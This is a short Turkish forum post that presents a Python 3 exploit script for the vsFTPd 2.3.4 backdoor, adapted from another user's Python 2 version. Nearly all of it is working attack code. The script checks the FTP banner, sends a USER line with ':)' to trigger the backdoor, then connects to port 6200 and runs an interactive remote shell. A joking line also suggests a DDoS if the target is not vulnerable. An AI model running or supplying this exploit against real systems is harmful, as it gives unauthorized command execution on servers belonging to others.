Merhaba arkadaşlar bugün python3 ile vsFTPd 2.3.4 exploit nasıl yazılır anlatımını yapıcam
@Belvando hocamız bu exploiti python 2 için yazmıştı bende python3 için bazı değişikler yapıp kendime göre yazdım
@Belvando hocamız bu exploiti python 2 için yazmıştı bende python3 için bazı değişikler yapıp kendime göre yazdım
Kod:
#gerekli modüller
import sys
import socket
#Burda exploitin çalışma şeklini belirtik yani python mt.py -h host -p port
for i in sys.argv:
if i == "-h":
mt = sys.argv.index(i)
mt += 1
host = sys.argv[mt]
elif i == "-p":
mt = sys.argv.index(i)
mt += 1
port = sys.argv[mt]
#Burda bağlantının IPv4 ve TCP üzerinden olacağını belirledik
tht = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#Burda girilen değerlere göre bağlantı yapılmış
tht.connect((host, int(port)))
#burda bağlanılan portun kontrolü yapılır
ug = tht.recv(1024).strip()
#burda bağlanılan portun kontrolü yapılır
if "vsFTPd 2.3.4".encode() in ug:
# burda exploit aşamaları başladı eğer açıklık var ise aşağıda shell açılır
tht.send(("USER something:)\n").encode())
tht.recv(1024)
tht.send(("PASS againsomething").encode())
tht.close()
print("Pencere açık :)")
#burda bağlanılan portun kontrolü yapılır
else:
print("Pencere açık değil bende kapıyı kırarım :)(ddos)")
exit()
#yine bağlantının nasıl yapılcağı olacağını gösterir
shll = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#shell in açılacağı port vs belirlenmiş
shll.connect((host,6200))
#döngü yaplıyor
while True:
#göndremek istenilen veri girilir
met = input("#")
#çıkmak için q ya basılır
if met == "q":
shll.close()
exit()
#veri karşı tarfa yollanıyor
shll.send((met+ "\n").encode())
#veriye göre cevp geliyor ve tekar while döngüsü başlar
print(shll.recv(1024))
